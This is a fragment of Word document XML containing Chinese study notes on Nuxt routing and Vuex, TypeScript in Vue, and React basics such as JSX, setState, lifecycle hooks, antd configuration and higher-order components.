        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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导航用&lt;nuxt-link to=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/users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&gt;&lt;/nuxt-link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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文件夹users下面的index.vue，是user的路由，其他文字的vue文件就是user/**lu路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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判断是否是服务端渲染的api：process.server //为true是服务器，false为前端渲染</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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动态路由_id.vue就会生成user/:id这样的路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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嵌套路由，如果有文件夹同名的vue文件，就会发生嵌套例如：user文件夹下面有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user.vue，那么user文件夹下面的文件都会成为子路由，user.vue中要放置&lt;nuxt-child&gt;&lt;/nuxt-child&gt;  就可以显示嵌套的子路由了，也可以该相关的布局页面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在layout下面新建user.vue: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&lt;template&gt;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&lt;div&gt;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&lt;h1&gt;这是一个标题&lt;/h1&gt;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&lt;nuxt /&gt;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&lt;/template&gt;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然后在page/user.vue 指定布局页面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Layout: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user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Head：{//可以配置加载css和js文件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Title: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标题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//改变标题，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Async asyncData(){  //nuxt框架下取异步数据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Console.log(process.server)//这个可以判断是否是在服务器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users  = await getUser()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{users} //最终会和data的数据合并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15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前端跨域问题的配置：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在nuxt.config.js里面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Modules:[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@nuxtjs/axios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],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Axios:{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Proxy:true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Proxy:{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/api/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http://localhost:3000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异步取数据：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Async asyncData({params，$axios}){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data=await $axios.$get(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/api/users/${params.id}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If(data.ok){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{user:data.user}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15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路由拦截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nuxt.config.js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plugins: ["@/plugins/element-ui", "@/plugins/router"],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在plugins下加入route.js文件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({app}) =&gt;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app.router.beforeEach((to,from,next)=&gt;{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console.log('我要去：'+to.path);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next();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};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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vuex：nuxt框架有store文件夹就自动启动vuex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在根目录下面加上index.js 代表没有命名空间的数据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const state = () =&gt; ({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counter: 0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const mutations =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increment(state)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state.counter++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在根目录下面加上user.js 代表user命名空间下面的数据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const state = () =&gt; ({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list: []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const mutations =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set(state, list)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state.list = list;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add(state, name)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state.list.push({ name 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触发：this.$store.commit(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user/set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 typeScript特点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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类型检查和类型注释</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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泛型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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声明文件</w:t>
      </w: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创建一个支持ts的vue项目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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 create vue-ts 选择项目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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自定义选项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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添加ts支持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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基于类组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Eslint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语法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Let title:string //类型注解，表示字符串类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Let name =‘xx’ //这里不会报错，有类型推断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Let names:string[] //字符串的数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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let name ：Array&lt;string&gt; //字符串的数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Let name :(string | number)[]//字符串和数字数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Let list :any[] //任意类型数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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greeting(person:string):string{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}//参数和返回值的类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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warn():viod{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}//没有返回值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//内置类型 ：string,number,boolean,viod,any,object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vue中ts 的class用法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 Component, Prop, Vue, Emit,Watch } from "vue-property-decorator";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class Hello extends Vue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Readonly foo:string=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foo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//只读属性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@Prop() private msg!:string=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name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//数字类型，必填，默认值name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@Prop() private  obj:{foo:string} //带有foo属性的对象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Private features=[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name1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name2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]//相当于data里面的数据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AddFeature(event:any){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This.features.push(event.target.value)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event.target.value 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””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Created(){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//变量前面的修饰符有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private 类里面可以用，外部访问可以用get set 封装访问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protected 子类也可以用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Public 不写默认public 都可以访问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Class Animal{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Constructor(private name:string){//相当于定义name属性并且将构造参数赋值给他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//自定义类约束：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class Feature {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constructor(public id: number, public name: string, public version: string) {}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private features: Feature[] = [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{name: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,id:1,version:1}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];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接口约束结构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interface Person {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firstName: string;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lastName: string;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sayHello(): string; // 要求实现方法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greeting2(person: Person) {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"Hello, " + person.firstName + " " + person.lastName;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//必须有sayHello方法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user = { firstName: "Jane", lastName: "User", sayHello: () =&gt; "lalala" };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console.log(greeting2(user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));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//类实现接口方法：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class Greeter implements Person {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constructor(public firstName = "", public lastName = "") {}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sayHello() {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"Hello, " + this.firstName + " " + this.lastName;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user2 = new Greeter("a", "b");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//计算属性的写法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Get featureCount(){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Return this.features.length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//派发事件：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@Emit()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private addFeature(event: any) {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 若没有返回值形参将作为事件参数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feature = {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name: event.target.value,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id: this.features.length + 1,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version: "1.0"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};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this.features.push(feature);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event.target.value = "";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feature; // 返回值作为事件参数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addFeature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是类里面的方法，可以被click调用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也表示派发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addFeature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事件，事件参数是返回值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18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函数参数：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sayhello(name:string,age?:number):string|number{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Return name+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+age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sayHello(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tom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,20)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sayHello(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tom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//参数没有问号就是必传的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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函数重载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info(a:{name:string}):string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info(a:string):object;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info(a:any):any{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If(typeof a===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object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){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a.name;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}else{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{name:a}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Info({name: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jerry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Info(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jerry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//两种类型的调用都可以，叫重载，先定义两种接口，在实现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18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泛型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泛型具体类：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class Feature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constructor(public id: number, public name: string, public version: string) {}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interface Result&lt;T&gt;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ok: 0 | 1;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data: T[];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泛型函数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getData&lt;T&gt;(): Promise&lt;Result&lt;T&gt;&gt;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data: any[] = [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{ id: 1, name: "类型注解", version: "2.0" },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{ id: 2, name: "编译型语言", version: "1.0"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];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Promise.resolve({ ok: 1, data } as Result&lt;T&gt;);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//调用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result = await getData&lt;Feature&gt;();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this.features = result.data;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18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装饰器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@Component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class Hello extends Vue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//如果不加括号就表示下面的是参数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//执行玩装饰器后又返回装饰器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//可以在括号里面直接添加参数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@Component({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props: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 属性也可以在这里配置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sname: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type: String,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default: "匿名"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class Hello extends Vue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Reat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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什么是jsx？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Jsx是javascript xml表现，用js描述html，每个节点代表一个函数调用，jsx经过webpack babel打包之后就成为虚拟dom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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react打包后的代码是react.createElement(dom，app)，所以需要引入react，即使没有用到过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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SetState发生了什么？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This.$updater.addClassBack(callback);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This.$updater.addState(nextState)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19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diff算法策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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同层比较，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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先比较类型，类型不一样就直接删除，换上新的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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比较属性有没有不同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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再往下递归比较</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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通过key加快同层查找比较，如果没有key的话只能删除插入了，操作会大大增加</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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多个setState合并成一个更新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5.基本组件写法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React .{Component} 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react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./app.css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logo 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./logo.svg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Class App extends Component{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Function formatname(user){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‘’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Render(){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Const name=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jerry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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Const jsx = &lt;p&gt;hello&lt;/p&gt;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Return (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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{/*注释写法*/}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;h1&gt;{name}&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;h1&gt;{ this.formatname() }&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;img src={logo} style={{width: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100px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}} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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{jsx}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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widowControl w:val="0"/>
        <w:numPr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{}里面四个表达式就行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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react 有两种类型的组件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function welcome1(props){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&lt;div&gt;webcome1,{props.name}&lt;/div&gt;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class webcome2 extend React.Component{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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Render(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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Return &lt;div&gt;welcome2,{this.props.name}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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注意：react里面没有双向绑定的，只有单向数据流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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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state例子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React，{Component} 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react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class Clock extends Component{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State={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Date:new Date()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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componentDidMount(){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This.timer =setInterval(()=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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This.setState({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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Date:new Date()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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numId w:val="0"/>
        </w:numPr>
        <w:ind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componentWillUnmont(){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clearInterval(this.timer)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Render(){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(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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{this.state.date.toString()}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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//批量执行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This.setState({count:this.state.count+1})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This.setState({count:this.state.count+1})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This.setDate({count:this.state.count+1})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三次执行会合并成一个，只执行了一次，结果是2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正确的写法是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This.setState((prevState)=&gt;{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Counter:prevState.counter+1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This.setState((prevState)=&gt;{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Counter:prevState.counter+1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This.setState((prevState)=&gt;{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Counter:prevState.counter+1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19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条件语句和循环语句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React, { Component } from "react";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class CartSample extends Component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//   状态初始化一般放在构造器中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constructor(props)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super(props);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//固定写法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this.state = {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//里面在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constructor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需要加thsi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goods: [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{ id: 1, text: "web全栈架构师" },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{ id: 2, text: "python全栈架构师"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]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Text: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};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This.addGood = this.addGood.bind(this)//绑定作用域的第二种方法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addToCart = good =&gt;{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newCart = [...this.state.cart]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idx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textChange =(e)=&gt;{//不用箭头函数会出现this的指向问题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="840" w:leftChars="100" w:hanging="630" w:hangingChars="3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This.setState({ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="400" w:firstLine="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Text:e.target.value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="100" w:hanging="630" w:hangingChars="3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="840" w:leftChars="100" w:hanging="630" w:hangingChars="3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Render(){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Return (&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1260" w:firstLineChars="6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{/* 条件渲染 */}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{this.props.title &amp;&amp; &lt;h1&gt;{this.props.title}&lt;/h1&gt;}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{/* 列表渲染 */}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&lt;ul&gt;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{this.state.goods.map(good =&gt; (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&lt;li key={good.id}&gt;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{good.text}&lt;/li&gt;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//写多一个参数传参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&lt;button onClick={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()=&gt;{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This.addToCart(good)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="2310" w:firstLineChars="1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firstLine="2310" w:firstLineChars="1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 w:firstLine="1890" w:firstLineChars="9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1890" w:firstLineChars="9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}&gt;&lt;/button&gt;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))}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&lt;/ul&gt;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{/* 事件绑定 */}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&lt;input type=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text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value ={this.state.text} onChange={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This.textChage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 /&gt;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&lt;/div&gt;)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19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生命周期函数：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React, { Component } from "react";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class Lifecycle extends Component {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constructor(props) {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super(props);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 常用于初始化状态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console.log("1.组件构造函数执行");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componentWillMount() {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 此时可以访问状态和属性，可进行api调用等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console.log("2.组件将要挂载");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componentDidMount() {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 组件已挂载，可进行状态更新操作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console.log("3.组件已挂载");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componentWillReceiveProps() {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//第一次组件渲染不会执行，要第二次prop变化才触发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 父组件传递的属性有变化，做相应响应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console.log("4.将要接收属性传递");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shouldComponentUpdate() {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 组件是否需要更新，需要返回布尔值结果，优化点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console.log("5.组件是否需要更新？");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true;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componentWillUpdate() {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 组件将要更新，可做更新统计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console.log("6.组件将要更新");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componentDidUpdate() {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 组件更新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console.log("7.组件已更新");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componentWillUnmount() {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 组件将要卸载, 可做清理工作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console.log("8.组件将要卸载");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render() {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console.log("组件渲染");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&lt;div&gt;生命周期探究&lt;/div&gt;;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触发render更新的方法是setState 变化和props的变化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16.4以后的版本加will的钩子都删掉了,因为引进了异步渲染机制，以前的will钩子会被多次执行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取而代之是getDerivedStateFromProps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65420" cy="3301365"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="5" name="图片 5" descr="158267236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582672366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19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配置按需加载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安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>react-app-rewired</w:t>
      </w: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取代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>react-scripts</w:t>
      </w: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，可以扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>webpack</w:t>
      </w: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的配置 ，类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">vue.confifig.js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npm install react</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>-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app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>-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rewired@2.0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>-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next.0 babel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>-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plugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>-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import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>--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save 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在跟目录加文件：config-overrides.js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{ injectBabelPlugin } = require("react-app-rewired");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module.exports = function override(config, env) {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config = injectBabelPlugin(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 在默认配置基础上注入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 插件名，插件配置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["import", { libraryName: "antd", libraryDirectory: "es", style: "css" }],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config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);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config = injectBabelPlugin(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["@babel/plugin-proposal-decorators", { legacy: true }],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config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);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config;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Packjson.js修改启动配置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"scripts": {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"start": "react-app-rewired start",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"build": "react-app-rewired build",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"test": "react-app-rewired test",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"eject": "react-app-rewired eject"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},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导入需要的组件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React, { Component } from 'react'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import Button from 'antd/lib/button'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import 'antd/dist/antd.css'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{Button} from 'antd'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class AntdTest extends Component {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render() {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(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&lt;div&gt;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&lt;Button type="primary"&gt;按钮&lt;/Button&gt;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&lt;/div&gt;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)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React的组件设计思路是状态的组件在父亲组件，展示的组件维护在函数子组件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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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react 在数据没有变化的情况下同过shouldComponentUpdata来判断是否需要更新，达到优化目的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shouldCpmponentUpdate(nextProps){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If(nextProps.data.body===this.props.data.body){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Return false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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}else{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Return true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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也可以用PureComponent,这个是一个shouldCpmponentUpdate的浅比较,不要在调用的时候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传对象，这样不会更新，应该在调用的时候用对象展开的方式：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&lt;Comment key={i} {...data} /&gt;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Class Comment extends React.PureComponent{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Render(){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Return ()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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高阶组件:就是一个函数，输入一个组件，加强功能后，放回一个新的组件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Comment =  Reat.meno(function(props)){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(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&lt;div&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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这种形式就拥有了PureComponent 的能力了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19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高阶组件的例子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原生组件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class Kaikeba extends Component {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render() {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(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&lt;div&gt;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{this.props.stage}-{this.props.name}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&lt;/div&gt;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);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//经过修饰的高阶组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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withkaikeba = comp=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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name=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高阶组件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</w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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props =&gt;{ &lt;comp {...props} name={name} }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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//调用高阶组件，放回新的组件实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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newComp = withkaikeba(kaikeba);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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//使用实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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class Hoc extends Component {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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render() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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newComp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stage="React" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
